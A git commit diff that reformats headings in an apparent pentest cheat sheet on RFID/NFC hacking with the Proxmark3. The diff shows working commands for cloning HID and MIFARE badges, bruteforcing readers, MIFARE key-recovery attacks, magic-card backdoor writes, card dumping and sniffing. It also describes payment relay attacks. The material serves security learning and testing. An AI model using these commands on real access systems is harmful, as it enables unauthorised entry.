Fix NFC Title

pull/24/head
Swissky 2023-12-19 21:11:56 +01:00
parent 0a46e272fc
commit 42e98fb9af
2 changed files with 48 additions and 43 deletions

View File

@ -1,4 +1,4 @@
# Amiibo # NFC - Amiibo
> Amiibo are small figurines or cards produced by Nintendo that contain Near Field Communication (NFC) chips. These chips allow the Amiibo to interact with various Nintendo gaming systems, such as the Wii U, Nintendo 3DS, and Nintendo Switch. > Amiibo are small figurines or cards produced by Nintendo that contain Near Field Communication (NFC) chips. These chips allow the Amiibo to interact with various Nintendo gaming systems, such as the Wii U, Nintendo 3DS, and Nintendo Switch.

View File

@ -1,9 +1,14 @@
# Radio Frequency Identification (RFID) & Near Field Communication (NFC) # NFC - RFID
### Install and configuration > Radio Frequency Identification (RFID) & Near Field Communication (NFC)
Dependencies to install first :\
`sudo apt-get install p7zip git build-essential libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none-eabi libstdc++-arm-none-eabi-newlib ncurses-dev libpcsclite-dev pcscd` ## Install and configuration
Dependencies to install first
```ps1
sudo apt-get install p7zip git build-essential libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none-eabi libstdc++-arm-none-eabi-newlib ncurses-dev libpcsclite-dev pcscd
```
Cloning and building the tool. Cloning and building the tool.
@ -36,7 +41,8 @@ Embedded Processor: ARM7TDMI
If the `ACR122` doesn't work properly, try `sudo rmmod pn533_usb` If the `ACR122` doesn't work properly, try `sudo rmmod pn533_usb`
#### Update and flash
### Update and flash
In order to update and flash your proxmark you have to kill the `ModemManager` process as it is interfering with the process. In order to update and flash your proxmark you have to kill the `ModemManager` process as it is interfering with the process.
@ -59,14 +65,14 @@ make armsrc/obj/fullimage.elf bootrom/obj/bootrom.elf client/flasher
./client/flasher /dev/ttyACM0 -b bootrom/obj/bootrom.elf armsrc/obj/fullimage.elf ./client/flasher /dev/ttyACM0 -b bootrom/obj/bootrom.elf armsrc/obj/fullimage.elf
``` ```
### Notes about card types ## Notes about card types
* **MIFARE Classic 1K/4K**: basically just a memory storage device. This memory, either 1024 or 4096 bytes, is divided into sectors and blocks. Most of the time used for regular access badges and has really simple security mechanisms for access control * **MIFARE Classic 1K/4K**: basically just a memory storage device. This memory, either 1024 or 4096 bytes, is divided into sectors and blocks. Most of the time used for regular access badges and has really simple security mechanisms for access control
* **MIFARE Ultralight**: a 64 bytes version of MIFARE Classic. Its low costs make it widely used as disposable tickets for events or transportation. * **MIFARE Ultralight**: a 64 bytes version of MIFARE Classic. Its low costs make it widely used as disposable tickets for events or transportation.
* **MIFARE Plus**: announced as a replacement of MIFARE Classic. The Plus subfamily brings the new level of security up to 128-bit AES encryption. * **MIFARE Plus**: announced as a replacement of MIFARE Classic. The Plus subfamily brings the new level of security up to 128-bit AES encryption.
* **MIFARE DESFire**: those tags come pre-programmed with a general purpose DESFire operating system which offers a simple directory structure and files, and are the type of MIFARE offering the highest security levels. * **MIFARE DESFire**: those tags come pre-programmed with a general purpose DESFire operating system which offers a simple directory structure and files, and are the type of MIFARE offering the highest security levels.
### LF - HID & Indala ## LF - HID & Indala
> Cloning requires writable T55xx card. The T55x7 card can be configured to emulate many of the 125 kHz tags. > Cloning requires writable T55xx card. The T55x7 card can be configured to emulate many of the 125 kHz tags.
@ -86,7 +92,7 @@ lf hitag info
lf hitag sim c378181c_a8f7.ht2 # simulate HiTag lf hitag sim c378181c_a8f7.ht2 # simulate HiTag
``` ```
### LF - EM410X ## LF - EM410X
Read only memory :/ Read only memory :/
@ -96,9 +102,9 @@ EM410x Tag ID: 23004d4dee
Proxmark> lf em4x em410xsim 23004d4dee Proxmark> lf em4x em410xsim 23004d4dee
``` ```
### HID : Example - Card ## HID : Example - Card
#### HID card format ### HID card format
```powershell ```powershell
proxmark3> lf hid decode 10001fc656 proxmark3> lf hid decode 10001fc656
@ -114,7 +120,7 @@ Facility Code: 1
-------------------------------------------------- --------------------------------------------------
``` ```
#### Write an HID card ### Write an HID card
```powershell ```powershell
# version with facility code is better # version with facility code is better
@ -144,7 +150,7 @@ proxmark3> lf hid encode H10302 c 220577
HID Prox TAG ID: 100006bb43 HID Prox TAG ID: 100006bb43
``` ```
#### Bruteforce an HID reader ### Bruteforce an HID reader
```powershell ```powershell
pm3 --> lf hid brute a 26 f 224 pm3 --> lf hid brute a 26 f 224
@ -159,7 +165,7 @@ d <delay> : delay betweens attempts in ms. Default 1000ms
v : verbose logging, show all tries v : verbose logging, show all tries
``` ```
### HF - Mifare DESFire ## HF - Mifare DESFire
> No known attacks yet ! Unencrypted sectors can be read, also you can try to look for default keys. All MIFARE cards are prone to relay attack. > No known attacks yet ! Unencrypted sectors can be read, also you can try to look for default keys. All MIFARE cards are prone to relay attack.
@ -173,13 +179,13 @@ v : verbose logging, show all tries
* Mifare DESFire EV1 : the challenge is done with AES or 3DES. * Mifare DESFire EV1 : the challenge is done with AES or 3DES.
* Mifare DESFire EV2 * Mifare DESFire EV2
### HF - Mifare Ultra Light ## HF - Mifare Ultra Light
* Ultralight C (3DES authentication) * Ultralight C (3DES authentication)
* Ultralight EV1 * Ultralight EV1
* NTAG2 * NTAG2
#### Chinese backdoor ### Chinese backdoor
```powershell ```powershell
pm3 --> hf 14a raw -p -b 7 40 pm3 --> hf 14a raw -p -b 7 40
@ -193,17 +199,17 @@ pm3 --> hf 14a raw -p -c a20059982120
0x44, fills card with 0x55 0x44, fills card with 0x55
``` ```
#### Simulate ### Simulate
```powershell ```powershell
hf 14a sim 2 <7-byte tag> hf 14a sim 2 <7-byte tag>
``` ```
### HF - Mifare Classic 1k ## HF - Mifare Classic 1k
New method for Proxmark : `hf mf autopwn` New method for Proxmark : `hf mf autopwn`
#### Darkside attack (PRNG Weak) ### Darkside attack (PRNG Weak)
**Proxmark method** **Proxmark method**
@ -227,7 +233,7 @@ mfcuk -C -R 0:A -v 3 -s 250 -S 250
mfcuk -C -R 3:A -v 3 -s 250 -S 250 -o mycard.mfc mfcuk -C -R 3:A -v 3 -s 250 -S 250 -o mycard.mfc
``` ```
#### Nested attack (PRNG Weak) ### Nested attack (PRNG Weak)
> Need to find a default key to extract the others > Need to find a default key to extract the others
@ -260,7 +266,7 @@ nfc-mfclassic w a key.mfd data.mfd # write data
nfc-mfclassic W a key.mfd data.mfd # write data and sector 0 nfc-mfclassic W a key.mfd data.mfd # write data and sector 0
``` ```
#### Hardnested attack ### Hardnested attack
> One key is needed in order to use this attack > One key is needed in order to use this attack
@ -301,7 +307,7 @@ Found key: c44e2b5e4ce3
Tested 21232975852 states Tested 21232975852 states
``` ```
#### Magic Chinese Card - Acronyms ### Magic Chinese Card - Acronyms
**UID** - The original Chinese Magic Backdoor card. These cards respond to the backdoor commands and will show Chinese magic backdoor commands (GEN 1a) detected when you do an hf search. These cards can be detected by probing the card to see if it responds to the backdoor commands. Some RFID systems may try to detect these cards. **UID** - The original Chinese Magic Backdoor card. These cards respond to the backdoor commands and will show Chinese magic backdoor commands (GEN 1a) detected when you do an hf search. These cards can be detected by probing the card to see if it responds to the backdoor commands. Some RFID systems may try to detect these cards.
@ -311,11 +317,11 @@ Tested 21232975852 states
**UFUID** - This type of card is apparently a "better" version of the FUID card. Instead of only allowing Block 0 to be written once, you can write to it many times and then lock the block later when you're happy with the result. After locking Block 0, it cannot be unlocked to my knowledge. I do not think there is currently a way to lock these cards using the Proxmark3. **UFUID** - This type of card is apparently a "better" version of the FUID card. Instead of only allowing Block 0 to be written once, you can write to it many times and then lock the block later when you're happy with the result. After locking Block 0, it cannot be unlocked to my knowledge. I do not think there is currently a way to lock these cards using the Proxmark3.
#### Magic Chinese Card - GEN 2 ### Magic Chinese Card - GEN 2
They can be copied directly. The software allows a new UID. They can be copied directly. The software allows a new UID.
#### Magic Chinese Card - GEN 1a ### Magic Chinese Card - GEN 1a
> **Works better on the official client.py instead of the iceman fork.** > **Works better on the official client.py instead of the iceman fork.**
@ -338,7 +344,7 @@ struct.pack('<I',2910621770).encode('hex')
'4a907cad' '4a907cad'
``` ```
#### Unbricking Chinese Magic Mifare Classic ### Unbricking Chinese Magic Mifare Classic
If you set the wrong BCC for UID and can't read the card anymore, you can use some backdoor commands to change sector 0 using Proxmark: If you set the wrong BCC for UID and can't read the card anymore, you can use some backdoor commands to change sector 0 using Proxmark:
@ -349,7 +355,7 @@ hf 14a raw -p -c a0 00
hf 14a raw -p -c de ad be ef 22 08 04 00 46 59 25 58 49 10 23 02 hf 14a raw -p -c de ad be ef 22 08 04 00 46 59 25 58 49 10 23 02
``` ```
#### Key Bruteforce/Dictionary attack ### Key Bruteforce/Dictionary attack
```powershell ```powershell
hf mf chk *1 ? t # Default keys hf mf chk *1 ? t # Default keys
@ -357,7 +363,7 @@ hf mf chk *1 ? d default_keys.dic
hf mf chk 0 A default_keys.dic # Dictionary attack with file: default_keys.dic hf mf chk 0 A default_keys.dic # Dictionary attack with file: default_keys.dic
``` ```
#### Write and read sectors ### Write and read sectors
> Avoid writing wrbl 3 (contains key A/B + permissions) > Avoid writing wrbl 3 (contains key A/B + permissions)
@ -370,7 +376,7 @@ proxmark3> hf mf wrbl 2 a ffffffffffff 464c4147313a4d31664072335f303037
hf mf rdsc <sector number> <key A/B> <key (12 hex symbols)> hf mf rdsc <sector number> <key A/B> <key (12 hex symbols)>
``` ```
#### Dump Mifare card ### Dump Mifare card
```powershell ```powershell
proxmark3> hf mf dump 1 k hf-mf-A29558E4-key.bin f hf-mf-A29558E4-data.bin proxmark3> hf mf dump 1 k hf-mf-A29558E4-key.bin f hf-mf-A29558E4-data.bin
@ -380,7 +386,7 @@ k <name> : key filename, if no <name> given, UID will be used as filename
f <name> : data filename, if no <name> given, UID will be used as filename f <name> : data filename, if no <name> given, UID will be used as filename
``` ```
#### Simulate and emulate Mifare card ### Simulate and emulate Mifare card
Emulate from a dump file Emulate from a dump file
@ -396,7 +402,7 @@ Simulate Mifare 1K UID
proxmark3> hf mf sim u 353c2aa6 proxmark3> hf mf sim u 353c2aa6
``` ```
#### MITM attack ### MITM attack
```powershell ```powershell
hf 14a snoop hf 14a snoop
@ -423,7 +429,7 @@ make
./mfkey64 xxxxxxxx 3b45a45a 7ddb6646 142fc1b9 9195fb3f ./mfkey64 xxxxxxxx 3b45a45a 7ddb6646 142fc1b9 9195fb3f
``` ```
#### Reader only attack ### Reader only attack
Emulate a MIFARE Classic with a DEADBEEF UID. Emulate a MIFARE Classic with a DEADBEEF UID.
@ -436,7 +442,7 @@ mf 1k sim uid: de ad be ef , numreads:0, flags:18 (0x12)
#db# 4B UID: deadbeef #db# 4B UID: deadbeef
``` ```
#### Read a Mifare Dump ### Read a Mifare Dump
```powershell ```powershell
pip install bitstring pip install bitstring
@ -444,9 +450,9 @@ git clone https://github.com/zhovner/mfdread
mfdread.py ./dump.mfd mfdread.py ./dump.mfd
``` ```
### HF - Mifare Classic 4k ## HF - Mifare Classic 4k
#### Chinese Magic Mifare Classic 4K ### Chinese Magic Mifare Classic 4K
Block 0 is writable through normal Mifare Classic commands, i.e. there is not special “unlocked” read/write like in “magic Mifare 1k” version. Block 0 is writable through normal Mifare Classic commands, i.e. there is not special “unlocked” read/write like in “magic Mifare 1k” version.
@ -458,7 +464,7 @@ hf mf wrbl 0 a FFFFFFFFFFFF 01020304040000000000000000000000
Again, watch out to have correct BCC and avoid Cascading Tag (0x88) as first byte of UID, or you may make the card unselectable (i.e. brick it). Again, watch out to have correct BCC and avoid Cascading Tag (0x88) as first byte of UID, or you may make the card unselectable (i.e. brick it).
### HF - Vigik ## HF - Vigik
Tool : https://github.com/cjbrigato/kigiv-for-proxmark3/releases Tool : https://github.com/cjbrigato/kigiv-for-proxmark3/releases
@ -471,21 +477,20 @@ mfoc -P 500 -O carte-originale.dmp # Copiez le contenu de la puce RFID dorigi
nfc-mfclassic W a carte-originale.dmp carte-vierge.dmp # Ecrire le contenu de la puce originale sur la puce chinoise nfc-mfclassic W a carte-originale.dmp carte-vierge.dmp # Ecrire le contenu de la puce originale sur la puce chinoise
``` ```
### Replay Attacks ## Replay Attacks
Replay attack is a technique where a malicious user could implement a device to intercept a NFC transaction and redeem it later, using other device or even in different location. Replay attack is a technique where a malicious user could implement a device to intercept a NFC transaction and redeem it later, using other device or even in different location.
### Relay Attack
## Relay Attack
The relay attack is a technique where a malicious user implements a man in the middle attack. The attacker(APDUer) is capable to intercept, manipulate and change the transaction in real time to take advantage of it. The relay attack is a technique where a malicious user implements a man in the middle attack. The attacker(APDUer) is capable to intercept, manipulate and change the transaction in real time to take advantage of it.
[https://en.wikipedia.org/wiki/Relay_attack](https://en.wikipedia.org/wiki/Relay_attack) [https://en.wikipedia.org/wiki/Relay_attack](https://en.wikipedia.org/wiki/Relay_attack)
### Intro to NFC Payment Relay Attacks * NFC Payment Relay Attacks - [intro-to-nfc-payment-relay-attacks/](https://salmg.net/2018/12/01/intro-to-nfc-payment-relay-attacks/)
[https://salmg.net/2018/12/01/intro-to-nfc-payment-relay-attacks/](https://salmg.net/2018/12/01/intro-to-nfc-payment-relay-attacks/) * NFCopy85 is a 10 dollars device to make replay attacks against NFC payment systems - [nfcopy85](https://salmg.net/2019/06/16/nfcopy85/)
### NFCopy85 is a 10 dollars device to make replay attacks against NFC payment systems
[https://salmg.net/2019/06/16/nfcopy85/](https://salmg.net/2019/06/16/nfcopy85/) ## References
### References
* https://blog.kchung.co/rfid-hacking-with-the-proxmark-3/ * https://blog.kchung.co/rfid-hacking-with-the-proxmark-3/
* https://aur.archlinux.org/packages/proxmark3/ * https://aur.archlinux.org/packages/proxmark3/